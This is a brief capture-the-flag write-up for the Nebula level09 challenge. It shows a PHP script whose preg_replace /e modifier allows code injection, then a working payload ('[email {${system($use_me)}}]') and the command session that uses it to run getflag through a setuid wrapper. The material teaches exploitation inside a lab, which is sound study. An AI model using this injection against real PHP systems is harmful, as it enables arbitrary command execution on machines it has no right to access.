Level09 provides us with a C setuid wrapper for some vulnerable PHP code.

    <?php

    function spam($email)
    {
      $email = preg_replace("/\./", " dot ", $email);
      $email = preg_replace("/@/", " AT ", $email);

      return $email;
    }

    function markup($filename, $use_me)
    {
      $contents = file_get_contents($filename);

      $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
      $contents = preg_replace("/\[/", "<", $contents);
      $contents = preg_replace("/\]/", ">", $contents);

      return $contents;
    }

    $output = markup($argv[1], $argv[2]);

    print $output;

    ?>

As you can see in the code above, the second argument – $use_me – is not used in the code.

After doing some research, multiple sources identified preg_replace() as a dangerous feature that was deprecated in PHP 5.5.0 and removed as of PHP 7.0.0.

This link provided useful information on the feature and even provided an example for exploitation.

Let’s inject our getflag command into the $use_me argument using the exploitation method from the link:

    level09@nebula:/home/flag09$ echo '[email {${system($use_me)}}]' > /tmp/useme
    level09@nebula:~$ cd /home/flag09/
    level09@nebula:/home/flag09$ ./flag09 /tmp/useme getflag
    You have successfully executed getflag on a target account
    PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

Looks like the injection was successful - we receive the output that indicates getflag was successfully executed.

Mike